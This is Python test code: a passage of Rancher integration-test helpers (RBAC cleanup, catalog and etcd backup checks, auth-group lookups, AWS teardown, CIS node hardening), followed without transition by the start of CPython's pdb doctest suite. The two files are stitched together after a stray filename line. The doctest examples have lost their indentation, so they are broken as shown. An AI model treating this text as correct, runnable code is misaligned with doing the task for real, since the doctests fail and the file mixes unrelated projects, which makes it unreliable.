    rbac_data["wl_unshared"] = workload
def rbac_cleanup():
    """Remove the projects, workloads and users created for the RBAC tests."""
    try:
        client = get_admin_client()
    except Exception:
        print("Not able to get admin client. Not performing RBAC cleanup")
        return
    for entry in rbac_data["users"].values():
        # best-effort: a user that is already gone must not abort cleanup
        try:
            client.delete(entry["user"])
        except Exception:
            pass
    client.delete(rbac_data["project"])
    client.delete(rbac_data["wl_unshared"])
    client.delete(rbac_data["p_unshared"])
def check_condition(condition_type, status):
    """Return a predicate that matches resources carrying a condition
    whose type and status both equal the requested values."""
    def _find_condition(resource):
        conditions = getattr(resource, "conditions", None)
        if not conditions:
            return False
        return any(c.type == condition_type and c.status == status
                   for c in conditions)
    return _find_condition
def create_catalog_external_id(catalog_name, template, version,
                               project_cluster_id=None, catalog_type=None):
    """Build the catalog:// external id for a template at a given version.

    Global catalogs (catalog_type None) reference the catalog by name only;
    "project"/"cluster" catalogs prefix it with the owning project/cluster
    id. Any other catalog_type yields None.
    """
    if catalog_type is None:
        return ("catalog://?catalog=" + catalog_name +
                "&template=" + template + "&version=" + version)
    if catalog_type in ("project", "cluster"):
        return ("catalog://?catalog=" + project_cluster_id + "/" +
                catalog_name + "&type=" + catalog_type +
                "Catalog&template=" + template + "&version=" + version)
def wait_for_catalog_active(client, catalog, timeout=DEFAULT_CATALOG_TIMEOUT):
    """Poll until the named catalog reaches state "active"; return it."""
    time.sleep(2)
    listing = client.list_catalog(name=catalog.name)
    print(listing)
    start = time.time()
    assert len(listing["data"]) >= 1, "Cannot find catalog"
    current = listing["data"][0]
    while current.state != "active":
        if time.time() - start > timeout:
            raise AssertionError(
                "Timed out waiting for state to get to active")
        time.sleep(.5)
        listing = client.list_catalog(name=catalog.name)
        assert len(listing["data"]) >= 1
        current = listing["data"][0]
    return current
def readDataFile(data_dir, name):
    """Return the text content of file *name* under *data_dir*."""
    fname = os.path.join(data_dir, name)
    print("File: " + fname)
    assert os.path.isfile(fname)
    with open(fname) as f:
        return f.read()
def set_url_password_token(server_url):
    """Returns a ManagementContext for the default global admin user.

    Side effects: logs in with the bootstrap admin/admin credentials,
    changes the admin password to ADMIN_PASSWORD and stores *server_url*
    in the "server-url" setting. Returns the admin login token.
    """
    auth_url = \
        server_url + "/v3-public/localproviders/local?action=login"
    # verify=False: test servers typically run with self-signed certificates
    r = requests.post(auth_url, json={
        'username': 'admin',
        'password': 'admin',
        'responseType': 'json',
    }, verify=False)
    print(r.json())
    token = r.json()['token']
    print(token)
    # Change admin password
    client = rancher.Client(url=server_url + "/v3",
                            token=token, verify=False)
    admin_user = client.list_user(username="admin").data
    admin_user[0].setpassword(newPassword=ADMIN_PASSWORD)
    # Set server-url settings
    serverurl = client.list_setting(name="server-url").data
    client.update(serverurl[0], value=server_url)
    return token
def validate_create_catalog(token, catalog_name, branch, url, permission=True):
    """
    This function validates if the user has the permission to create a
    global catalog.
    :param token: user's token
    :param catalog_name: the name of the catalog
    :param branch: the branch of the git repo
    :param url: the url of the git repo
    :param permission: boolean value, True if the user can create catalog
    :return: the catalog object or None
    """
    client = get_client_for_token(token)
    if not permission:
        # Creation must be rejected with 403/Forbidden for this user.
        with pytest.raises(ApiError) as e:
            client.create_catalog(name=catalog_name,
                                  branch=branch,
                                  url=url)
        error_msg = "user with no permission should receive 403: Forbidden"
        error_code = e.value.error.code
        error_status = e.value.error.status
        assert error_status == 403 and error_code == 'Forbidden', error_msg
        return None
    else:
        try:
            client.create_catalog(name=catalog_name,
                                  branch=branch,
                                  url=url)
        except ApiError as e:
            assert False, "user with permission should receive no exception:" \
                          + str(e.error.status) + " " + e.error.code
    # Confirm the catalog is actually listed before returning it.
    catalog_list = client.list_catalog(name=catalog_name).data
    assert len(catalog_list) == 1
    return catalog_list[0]
def generate_template_global_role(name, new_user_default=False, template=None):
    """Return a deep-copied global-role template with `name` and
    `newUserDefault` filled in.

    Falls back to TEMPLATE_MANAGE_CATALOG when no template is given and
    to a random name when `name` is None.
    """
    base = TEMPLATE_MANAGE_CATALOG if template is None else template
    result = deepcopy(base)
    result["newUserDefault"] = "true" if new_user_default else "false"
    result["name"] = name if name is not None else random_name()
    return result
def wait_for_backup_to_active(cluster, backupname,
                              timeout=DEFAULT_TIMEOUT):
    """Poll until the named etcd backup reaches state "active".

    Returns the final state string; raises AssertionError on timeout.
    """
    deadline = time.time() + timeout

    def _current_state():
        backups = cluster.etcdBackups(name=backupname)
        assert len(backups) == 1
        return backups['data'][0]['state']

    state = _current_state()
    while state != "active":
        if time.time() > deadline:
            raise AssertionError(
                "Timed out waiting for state to get to active")
        time.sleep(.5)
        state = _current_state()
    print("BACKUP STATE")
    print(state)
    return state
def wait_for_backup_to_delete(cluster, backupname,
                              timeout=DEFAULT_TIMEOUT):
    """Poll until the named etcd backup disappears; assert on timeout."""
    deadline = time.time() + timeout
    while len(cluster.etcdBackups(name=backupname)) == 1:
        if time.time() > deadline:
            raise AssertionError(
                "Timed out waiting for backup to be deleted")
        time.sleep(.5)
def validate_backup_create(namespace, backup_info, backup_mode=None):
    """Create a daemonset workload and an ingress, take an etcd backup of
    the RKE cluster, and verify the backup exists in the chosen store.

    :param namespace: dict with "p_client", "ns", "cluster" (and "nodes"
        when backup_mode == "filesystem"); "host" is added here
    :param backup_info: dict updated in place with backup name/id/data
    :param backup_mode: None, "s3" or "filesystem"
    :return: the (namespace, backup_info) pair, updated in place
    """
    p_client = namespace["p_client"]
    ns = namespace["ns"]
    cluster = namespace["cluster"]
    name = random_test_name("default")
    # etcd snapshot APIs only exist on RKE-provisioned clusters.
    if not hasattr(cluster, 'rancherKubernetesEngineConfig'):
        assert False, "Cluster is not of type RKE"
    con = [{"name": "test1",
            "image": TEST_IMAGE}]
    backup_info["workload"] = p_client.create_workload(name=name,
                                                       containers=con,
                                                       namespaceId=ns.id,
                                                       daemonSetConfig={})
    validate_workload(p_client, backup_info["workload"], "daemonSet", ns.name,
                      len(get_schedulable_nodes(cluster)))
    host = "test" + str(random_int(10000, 99999)) + ".com"
    namespace["host"] = host
    path = "/name.html"
    rule = {"host": host,
            "paths": [{"workloadIds": [backup_info["workload"].id],
                       "targetPort": "80"}]}
    p_client.create_ingress(name=name,
                            namespaceId=ns.id,
                            rules=[rule])
    validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
    # Perform Backup
    backup = cluster.backupEtcd()
    backup_info["backupname"] = backup['metadata']['name']
    wait_for_backup_to_active(cluster, backup_info["backupname"])
    # Get all the backup info
    etcdbackups = cluster.etcdBackups(name=backup_info["backupname"])
    backup_info["etcdbackupdata"] = etcdbackups['data']
    backup_info["backup_id"] = backup_info["etcdbackupdata"][0]['id']
    if backup_mode == "s3":
        backupfileurl = backup_info["etcdbackupdata"][0]['filename']
        # Check the backup filename exists in S3
        parseurl = urlparse(backupfileurl)
        backup_info["backupfilename"] = os.path.basename(parseurl.path)
        backup_found = AmazonWebServices().s3_backup_check(
            backup_info["backupfilename"])
        assert backup_found, "the backup was not found in the S3 bucket"
    elif backup_mode == 'filesystem':
        # Verify the snapshot file landed on every etcd node's disk.
        for node in namespace['nodes']:
            if 'etcd' not in node.roles:
                continue
            get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
            response = node.execute_command(get_filesystem_snapshots)[0]
            assert backup_info["etcdbackupdata"][0]['filename'] in response, \
                "The filename doesn't match any of the files locally"
    return namespace, backup_info
def validate_backup_restore(namespace, backup_info):
    """Restore the cluster from the earlier etcd backup and verify that
    pre-snapshot state (the ingress) survives while post-snapshot state
    (a new workload) is gone.

    :return: (namespace, backup_info)
    """
    p_client = namespace["p_client"]
    ns = namespace["ns"]
    client = get_user_client()
    cluster = namespace["cluster"]
    name = random_test_name("default")
    host = namespace["host"]
    path = "/name.html"
    con = [{"name": "test1",
            "image": TEST_IMAGE}]
    # Create workload after backup
    testworkload = p_client.create_workload(name=name,
                                            containers=con,
                                            namespaceId=ns.id)
    validate_workload(p_client, testworkload, "deployment", ns.name)
    # Perform Restore
    cluster.restoreFromEtcdBackup(etcdBackupId=backup_info["backup_id"])
    # After restore, validate cluster
    validate_cluster(client, cluster, intermediate_state="updating",
                     check_intermediate_state=True,
                     skipIngresscheck=False)
    # Verify the ingress created before taking the snapshot
    validate_ingress(p_client, cluster, [backup_info["workload"]], host, path)
    # Verify the workload created after getting a snapshot does not exist
    # after restore
    workload_list = p_client.list_workload(uuid=testworkload.uuid).data
    print(len(workload_list))
    assert len(workload_list) == 0, "workload shouldn't exist after restore"
    return namespace, backup_info
def validate_backup_delete(namespace, backup_info, backup_mode=None):
    """Delete the etcd backup and verify it is gone both from Rancher and
    from the backing store (S3 bucket or etcd nodes' filesystem).

    :param backup_mode: None, "s3" or "filesystem"
    """
    client = get_user_client()
    cluster = namespace["cluster"]
    client.delete(
        cluster.etcdBackups(name=backup_info["backupname"])['data'][0]
    )
    wait_for_backup_to_delete(cluster, backup_info["backupname"])
    assert len(cluster.etcdBackups(name=backup_info["backupname"])) == 0, \
        "backup shouldn't be listed in the Cluster backups"
    if backup_mode == "s3":
        # Check the backup reference is deleted in Rancher and S3
        backup_found = AmazonWebServices().s3_backup_check(
            backup_info["backupfilename"])
        assert_message = "The backup should't exist in the S3 bucket"
        assert backup_found is False, assert_message
    elif backup_mode == 'filesystem':
        # The snapshot file must be gone from every etcd node's disk.
        for node in namespace['nodes']:
            if 'etcd' not in node.roles:
                continue
            get_filesystem_snapshots = 'ls /opt/rke/etcd-snapshots'
            response = node.execute_command(get_filesystem_snapshots)[0]
            filename = backup_info["etcdbackupdata"][0]['filename']
            assert filename not in response, \
                "The file still exist in the filesystem"
def apply_crd(ns, file, kubectl_context):
    """kubectl-apply the manifest `file` in namespace `ns`; return the
    command output decoded as ASCII text."""
    cmd = 'apply -f ' + file + ' -n ' + ns.name
    raw = execute_kubectl_cmd(cmd, json_out=False, stderr=True,
                              kubeconfig=kubectl_context)
    return raw.decode("ascii")
def get_crd(ns, crd_name, kubectl_context):
    """kubectl-get `crd_name` in namespace `ns`; return the text output."""
    cmd = 'get ' + crd_name + ' -n ' + ns.name
    raw = execute_kubectl_cmd(cmd, json_out=False, stderr=True,
                              kubeconfig=kubectl_context)
    return raw.decode("ascii")
def delete_crd(ns, file, kubectl_context):
    """kubectl-delete the manifest `file` in namespace `ns`; return the
    text output."""
    cmd = 'delete -f ' + file + ' -n ' + ns.name
    raw = execute_kubectl_cmd(cmd, json_out=False, stderr=True,
                              kubeconfig=kubectl_context)
    return raw.decode("ascii")
def prepare_auth_data():
    """Load the nested-group fixture for AUTH_PROVIDER from the resource
    directory and populate the module-level `nested_group` dict.

    After this call:
      nested_group["auth_info"] - copy of the full "nested_group_info" blob
      nested_group["users"]     - the fixture's "users" entry
      nested_group["group_dic"] - group name -> group info (sans "users")
      nested_group["groups"]    - view of the group names
    """
    name = \
        os.path.join(os.path.dirname(os.path.realpath(__file__)) + "/resource",
                     AUTH_PROVIDER.lower() + ".json")
    with open(name) as reader:
        auth_data = reader.read()
    raw = json.loads(auth_data).get("nested_group_info")
    nested_group["auth_info"] = raw.copy()
    nested_group["users"] = raw.get("users")
    # Drop "users" so that only group entries remain in group_dic.
    raw.pop("users")
    nested_group["group_dic"] = raw
    nested_group["groups"] = raw.keys()
def is_nested():
    """Return True when the loaded group data contains nested-group info,
    i.e. fewer than all entries in nested_group["group_dic"] are empty.
    """
    group_dic = nested_group["group_dic"]
    empty_entries = sum(1 for info in group_dic.values() if len(info) == 0)
    return empty_entries < len(group_dic)
def get_group(nested=False):
    """ return a group or a nested group"""
    if nested:
        # return the name of a group that contains at least one other group
        for item in nested_group["groups"]:
            # NOTE(review): the two `pass` statements below look like they
            # were meant to be `continue`; as written they are no-ops.  The
            # empty-sub_groups case is still harmless (the inner loop simply
            # does not run), but groups with no direct users are not skipped
            # -- confirm intent against the original fixture data.
            if len(nested_group["group_dic"].get(item).get("users")) == 0:
                pass
            sub_groups = nested_group["group_dic"].get(item).get("groups")
            if len(sub_groups) == 0:
                pass
            # Pick this group only if some sub-group has direct users.
            for g in sub_groups:
                if len(nested_group["group_dic"].get(g).get("users")) > 0:
                    return item
        assert False, "cannot find any valid nested group"
    else:
        # return the name of a group that has at least one direct user
        for group in nested_group["groups"]:
            if len(nested_group["group_dic"].get(group).get("users")) > 0:
                return group
        assert False, "cannot find any valid non-nested group"
def get_user_by_group(group, nested=False):
    """ return the list of users in the group or nested group
    if nested is False, return the direct users in the group;
    otherwise, return all users including those from nested groups
    """
    def get_user_in_nested_group(group, source):
        # Recursively collect users from `group` and all of its sub-groups.
        if group == "":
            return []
        # Bug fix: copy the list.  Appending to the object returned by
        # .get("users") mutated the shared fixture in source["group_dic"],
        # corrupting later lookups of the same group.
        users = list(source["group_dic"].get(group).get("users"))
        for sub_group in source["group_dic"].get(group).get("groups"):
            temp = get_user_in_nested_group(sub_group, source)
            for user in temp:
                if user not in users:
                    users.append(user)
        return users
    if nested:
        users = get_user_in_nested_group(group, nested_group)
        assert len(users) > 0, "no user in the group"
    else:
        users = nested_group["group_dic"].get(group).get("users")
        assert users is not None, "no user in the group"
    print("group: {}, users: {}".format(group, users))
    return users
def get_a_group_and_a_user_not_in_it(nested=False):
    """ return a group or a nested group and a user that is not in the group"""
    all_users = nested_group["users"]
    for group in nested_group["groups"]:
        # Membership is direct-only, or includes nested groups when `nested`.
        group_users = get_user_by_group(group, nested)
        for user in all_users:
            if user not in group_users:
                print("group: {}, user not in it: {}".format(group, user))
                return group, user
    assert False, "cannot find a group and a user not in it"
def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200):
    """ get the group's principal id from the auth provider"""
    headers = {'Authorization': 'Bearer ' + token}
    # Search the auth provider's principals for a group with this name.
    r = requests.post(CATTLE_AUTH_PRINCIPAL_URL,
                      json={'name': group_name,
                            'principalType': 'group',
                            'responseType': 'json'},
                      verify=False, headers=headers)
    assert r.status_code == expected_status
    # NOTE(review): assumes the first search hit is the wanted group.
    return r.json()['data'][0]["id"]
def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL):
    """Log in with an auth-provider account and return the decoded JSON
    login response (which carries the user token)."""
    payload = {
        'username': username,
        'password': password,
        'responseType': 'json',
    }
    resp = requests.post(login_url, json=payload, verify=False)
    assert resp.status_code in [200, 201]
    return resp.json()
def validate_service_discovery(workload, scale,
                               p_client=None, ns=None, testclient_pods=None):
    """Check that the workload's cluster-local DNS name resolves to the
    pod IPs of all `scale` replicas, from each given test-client pod."""
    pods = p_client.list_pod(workloadId=workload["id"]).data
    assert len(pods) == scale
    expected_ips = [pod["status"]["podIp"] for pod in pods]
    host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id)
    for pod in testclient_pods:
        validate_dns_entry(pod, host, expected_ips)
def auth_get_project():
    # Shared AUTH-test project created by add_role_to_user (or None).
    return auth_rbac_data["project"]
def auth_get_namespace():
    # Shared AUTH-test namespace created by add_role_to_user (or None).
    return auth_rbac_data["namespace"]
def auth_get_user_token(username):
    # Token of a previously registered auth user, or None if unknown.
    if username in auth_rbac_data["users"].keys():
        return auth_rbac_data["users"][username].token
    return None
def add_role_to_user(user, role):
    """this function adds a user from the auth provider to given cluster"""
    admin_client, cluster = get_global_admin_client_and_cluster()
    project = auth_get_project()
    ns = auth_get_namespace()
    # Lazily create the shared test project/namespace on first use.
    if not (project and ns):
        project, ns = create_project_and_ns(ADMIN_TOKEN, cluster,
                                            random_test_name("p-test-auth"))
        auth_rbac_data["project"] = project
        auth_rbac_data["namespace"] = ns
    # Project-scoped roles bind to the project, everything else to the cluster.
    if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]:
        assign_members_to_project(admin_client, user, project, role)
    else:
        assign_members_to_cluster(admin_client, user, cluster, role)
    # Remember the user so cleanup can remove its bindings later.
    auth_rbac_data["users"][user.username] = user
def auth_resource_cleanup():
    """ remove the project and namespace created for the AUTH tests
    and drop all cluster role template bindings of the test users"""
    client, cluster = get_global_admin_client_and_cluster()
    client.delete(auth_rbac_data["project"])
    auth_rbac_data["project"] = None
    # Bug fix: the namespace is stored under the "namespace" key (see
    # add_role_to_user / auth_get_namespace); the old code cleared a stray
    # "ns" key, leaving the stale namespace object in place so the
    # project/namespace pair was never recreated.
    auth_rbac_data["namespace"] = None
    for username, user in auth_rbac_data["users"].items():
        user_crtbs = client.list_cluster_role_template_binding(userId=user.id)
        for crtb in user_crtbs:
            client.delete(crtb)
class WebsocketLogParse:
    """
    the class is used for receiving and parsing the message
    received from the websocket
    """
    def __init__(self):
        # Protects _last_message, which is shared with the receiver thread.
        self.lock = Lock()
        self._last_message = ''
    def receiver(self, socket, skip):
        """
        run a thread to receive and save the message from the web socket
        :param socket: the socket connection
        :param skip: if True skip the first char of the received message
        """
        # NOTE(review): `True and` is redundant; the loop runs while the
        # socket stays connected.
        while True and socket.connected:
            try:
                data = socket.recv()
                # the message from the kubectl contains an extra char
                if skip:
                    data = data[1:]
                # NOTE(review): this `pass` looks like an intended
                # `continue` for short frames; as written, short frames are
                # still base64-decoded below -- confirm intent.
                if len(data) < 5:
                    pass
                data = base64.b64decode(data).decode()
                self.lock.acquire()
                self._last_message += data
                self.lock.release()
            except websocket.WebSocketConnectionClosedException:
                print("Connection closed")
                break
            except websocket.WebSocketProtocolException as wpe:
                print("Error: {}".format(wpe))
                break
    @staticmethod
    def start_thread(target, args):
        # Daemon thread so a stuck receiver cannot block interpreter exit.
        thread = Thread(target=target, args=args)
        thread.daemon = True
        thread.start()
        # Give the receiver a moment to start before the caller proceeds.
        time.sleep(1)
    @property
    def last_message(self):
        # Accumulated decoded text received so far.
        return self._last_message
    @last_message.setter
    def last_message(self, value):
        self.lock.acquire()
        self._last_message = value
        self.lock.release()
def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT):
    """Poll until no cluster named `cluster_name` remains.

    Raises AssertionError if the cluster is still listed after `timeout`.
    """
    deadline = time.time() + timeout
    while len(client.list_cluster(name=cluster_name).data) != 0:
        if time.time() > deadline:
            raise AssertionError(
                "Timed out waiting for cluster to get deleted")
        time.sleep(.5)
def create_connection(url, subprotocols):
    """
    create a websocket connection and check if it is connected
    :param url: the url to connect to
    :param subprotocols: the list of subprotocols
    :return: the connected websocket object
    """
    ws = websocket.create_connection(
        url=url,
        sslopt={"cert_reqs": ssl.CERT_NONE},  # test env: skip cert validation
        subprotocols=subprotocols,
        timeout=10,
        cookie="R_SESS=" + USER_TOKEN  # authenticate via the session cookie
    )
    assert ws.connected, "failed to build the websocket"
    return ws
def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT):
    """Poll the HPA by uuid until its state is "active"; return the
    refreshed object or raise AssertionError on timeout."""
    deadline = time.time() + timeout
    matches = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
    assert len(matches) == 1
    hpa = matches[0]
    while hpa.state != "active":
        if time.time() > deadline:
            raise AssertionError(
                "Timed out waiting for state to get to active")
        time.sleep(.5)
        matches = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
        assert len(matches) == 1
        hpa = matches[0]
    return hpa
def create_pv_pvc(client, ns, nfs_ip, cluster_client):
    """Create an NFS-backed PV (cluster scope) plus a 10Gi PVC bound to it
    in namespace `ns`; return (pv, pvc) once the claim is bound."""
    pv_object = create_pv(cluster_client, nfs_ip)
    pvc_name = random_test_name("pvc")
    # Empty storageClassId so the claim binds directly to the created PV.
    pvc_config = {"accessModes": ["ReadWriteOnce"],
                  "name": pvc_name,
                  "volumeId": pv_object.id,
                  "namespaceId": ns.id,
                  "storageClassId": "",
                  "resources": {"requests": {"storage": "10Gi"}}
                  }
    pvc_object = client.create_persistent_volume_claim(pvc_config)
    pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300)
    return pv_object, pvc_object
def create_pv(client, nfs_ip):
    """Create a 50Gi NFS-backed persistent volume served from `nfs_ip`
    and sanity-check the created object before returning it."""
    pv_name = random_test_name("pv")
    pv_config = {"type": "persistentVolume",
                 "accessModes": ["ReadWriteOnce"],
                 "name": pv_name,
                 "nfs": {"readOnly": "false",
                         "type": "nfsvolumesource",
                         "path": NFS_SERVER_MOUNT_PATH,
                         "server": nfs_ip
                         },
                 "capacity": {"storage": "50Gi"}
                 }
    pv_object = client.create_persistent_volume(pv_config)
    capacitydict = pv_object['capacity']
    assert capacitydict['storage'] == '50Gi'
    assert pv_object['type'] == 'persistentVolume'
    return pv_object
def delete_resource_in_AWS_by_prefix(resource_prefix):
    """
    Best-effort cleanup of the AWS resources named after `resource_prefix`:
    EC2 nodes, NLBs with their target groups, the RDS database, and the
    Route 53 records.

    :param resource_prefix: the prefix of resource name
    :return: None
    """
    # Reuse one client wrapper instead of re-instantiating it per call.
    aws = AmazonWebServices()
    # delete nodes of both local and custom clusters
    node_filter = [{
        'Name': 'tag:Name',
        'Values': [resource_prefix + "-*"]
    }]
    nodes = aws.get_nodes(filters=node_filter)
    if nodes is None:
        print("deleting the following instances: None")
    else:
        print("deleting the following instances: {}"
              .format([node.public_ip_address for node in nodes]))
        aws.delete_nodes(nodes)
    # delete load balancer and target groups
    tg_list = []
    lb_list = []
    lb_names = [resource_prefix + '-nlb',
                resource_prefix + '-multinode-nlb',
                resource_prefix + '-k3s-nlb',
                resource_prefix + '-internal-nlb']
    for name in lb_names:
        lb_arn = aws.get_lb(name)
        if lb_arn is not None:
            lb_list.append(lb_arn)
            tg_list.extend(aws.get_target_groups(lb_arn))
    print("deleting the following load balancers: {}".format(lb_list))
    print("deleting the following target groups: {}".format(tg_list))
    for lb in lb_list:
        aws.delete_lb(lb)
    for tg in tg_list:
        aws.delete_target_group(tg)
    # delete rds
    db_name = resource_prefix + "-multinode-db"
    print("deleting the database (if it exists): {}".format(db_name))
    aws.delete_db(db_name)
    # delete the route 53 record
    route53_names = [resource_prefix + ".qa.rancher.space.",
                     resource_prefix + "-internal.qa.rancher.space."]
    for name in route53_names:
        print("deleting the route53 record (if it exists): {}".format(name))
        aws.delete_route_53_record(name)
    print("deletion is done")
    return None
def configure_cis_requirements(aws_nodes, profile, node_roles, client,
                               cluster):
    """Apply the node-level hardening required by the given CIS benchmark
    profile, register each node into the cluster, and wait until the
    cluster is active.

    :param aws_nodes: nodes to configure (parallel to node_roles)
    :param profile: 'rke-cis-1.4' or 'rke-cis-1.5'
    :param node_roles: list of role-lists, one entry per node
    :return: the validated (active) cluster
    """
    i = 0
    if profile == 'rke-cis-1.4':
        for aws_node in aws_nodes:
            # kernel settings required by the CIS 1.4 benchmark
            aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
            aws_node.execute_command("sudo sysctl -w kernel.panic=10")
            aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
            # etcd nodes must run the etcd process as a dedicated user
            if node_roles[i] == ["etcd"]:
                aws_node.execute_command("sudo useradd etcd")
            docker_run_cmd = \
                get_custom_host_registration_cmd(client,
                                                 cluster,
                                                 node_roles[i],
                                                 aws_node)
            aws_node.execute_command(docker_run_cmd)
            i += 1
    elif profile == 'rke-cis-1.5':
        for aws_node in aws_nodes:
            # kernel settings required by the CIS 1.5 benchmark
            aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
            aws_node.execute_command("sudo sysctl -w kernel.panic=10")
            aws_node.execute_command("sudo sysctl -w vm.panic_on_oom=0")
            aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
            aws_node.execute_command("sudo sysctl -w "
                                     "kernel.keys.root_maxbytes=25000000")
            # CIS 1.5 pins the etcd user/group to fixed ids
            if node_roles[i] == ["etcd"]:
                aws_node.execute_command("sudo groupadd -g 52034 etcd")
                aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd")
            docker_run_cmd = \
                get_custom_host_registration_cmd(client,
                                                 cluster,
                                                 node_roles[i],
                                                 aws_node)
            aws_node.execute_command(docker_run_cmd)
            i += 1
    time.sleep(5)
    cluster = validate_cluster_state(client, cluster)
    # the workloads under System project to get active
    time.sleep(20)
    if profile == 'rke-cis-1.5':
        # CIS 1.5 defaults to deny-all networking; allow traffic everywhere
        create_kubeconfig(cluster)
        network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml"
        items = execute_kubectl_cmd("get namespaces -A")["items"]
        all_ns = [item["metadata"]["name"] for item in items]
        for ns in all_ns:
            execute_kubectl_cmd("apply -f {0} -n {1}".
                                format(network_policy_file, ns))
    return cluster
def get_node_details(cluster, client):
    """
    lists the nodes from the cluster. This cluster has only 1 node.
    :return: client and node object
    """
    create_kubeconfig(cluster)
    nodes = client.list_node(clusterId=cluster.id).data
    assert len(nodes) > 0
    # NOTE(review): if no worker node exists, the loop falls through and
    # the last listed node is returned; with the expected single-node
    # cluster this is the same node either way.
    for node in nodes:
        if node.worker:
            break
    return client, node
|
test_pdb.py | # A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import codecs
import unittest
import subprocess
import textwrap
import linecache
from contextlib import ExitStack
from io import StringIO
from test.support import os_helper
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
    """Context manager that makes testing Pdb in doctests easier."""
    def __init__(self, input):
        # `input` is the list of canned pdb command strings fed to stdin.
        # (NOTE(review): the parameter shadows the `input` builtin.)
        self.input = input
    def __enter__(self):
        # Swap stdin for a fake that replays the canned commands.
        self.real_stdin = sys.stdin
        sys.stdin = _FakeInput(self.input)
        self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
    def __exit__(self, *exc):
        sys.stdin = self.real_stdin
        # NOTE(review): the saved trace function is restored only when it
        # was truthy; sys.settrace(None) is never called here.
        if self.orig_trace:
            sys.settrace(self.orig_trace)
def test_pdb_displayhook():
    """This tests the custom displayhook for pdb.
    >>> def test_function(foo, bar):
    ... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ... pass
    >>> with PdbTestInput([
    ... 'foo',
    ... 'bar',
    ... 'for i in range(5): print(i)',
    ... 'continue',
    ... ]):
    ... test_function(1, None)
    > <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
    -> pass
    (Pdb) foo
    1
    (Pdb) bar
    (Pdb) for i in range(5): print(i)
    0
    1
    2
    3
    4
    (Pdb) continue
    """
    # NOTE: the docstring above is an executable doctest; its expected
    # output is matched verbatim by the doctest runner, so do not edit it
    # cosmetically.
def test_pdb_basic_commands():
    """Test the basic commands of pdb.
    >>> def test_function_2(foo, bar='default'):
    ... print(foo)
    ... for i in range(5):
    ... print(i)
    ... print(bar)
    ... for i in range(10):
    ... never_executed
    ... print('after for')
    ... print('...')
    ... return foo.upper()
    >>> def test_function3(arg=None, *, kwonly=None):
    ... pass
    >>> def test_function4(a, b, c, /):
    ... pass
    >>> def test_function():
    ... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
    ... ret = test_function_2('baz')
    ... test_function3(kwonly=True)
    ... test_function4(1, 2, 3)
    ... print(ret)
    >>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
    ... 'step', # entering the function call
    ... 'args', # display function args
    ... 'list', # list function source
    ... 'bt', # display backtrace
    ... 'up', # step up to test_function()
    ... 'down', # step down to test_function_2() again
    ... 'next', # stepping to print(foo)
    ... 'next', # stepping to the for loop
    ... 'step', # stepping into the for loop
    ... 'until', # continuing until out of the for loop
    ... 'next', # executing the print(bar)
    ... 'jump 8', # jump over second for loop
    ... 'return', # return out of function
    ... 'retval', # display return value
    ... 'next', # step to test_function3()
    ... 'step', # stepping into test_function3()
    ... 'args', # display function args
    ... 'return', # return out of function
    ... 'next', # step to test_function4()
    ... 'step', # stepping to test_function4()
    ... 'args', # display function args
    ... 'continue',
    ... ]):
    ... test_function()
    > <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
    -> ret = test_function_2('baz')
    (Pdb) step
    --Call--
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
    -> def test_function_2(foo, bar='default'):
    (Pdb) args
    foo = 'baz'
    bar = 'default'
    (Pdb) list
    1 -> def test_function_2(foo, bar='default'):
    2 print(foo)
    3 for i in range(5):
    4 print(i)
    5 print(bar)
    6 for i in range(10):
    7 never_executed
    8 print('after for')
    9 print('...')
    10 return foo.upper()
    [EOF]
    (Pdb) bt
    ...
    <doctest test.test_pdb.test_pdb_basic_commands[4]>(25)<module>()
    -> test_function()
    <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
    -> ret = test_function_2('baz')
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
    -> def test_function_2(foo, bar='default'):
    (Pdb) up
    > <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
    -> ret = test_function_2('baz')
    (Pdb) down
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
    -> def test_function_2(foo, bar='default'):
    (Pdb) next
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
    -> print(foo)
    (Pdb) next
    baz
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
    -> for i in range(5):
    (Pdb) step
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
    -> print(i)
    (Pdb) until
    0
    1
    2
    3
    4
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
    -> print(bar)
    (Pdb) next
    default
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
    -> for i in range(10):
    (Pdb) jump 8
    > <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
    -> print('after for')
    (Pdb) return
    after for
    ...
    --Return--
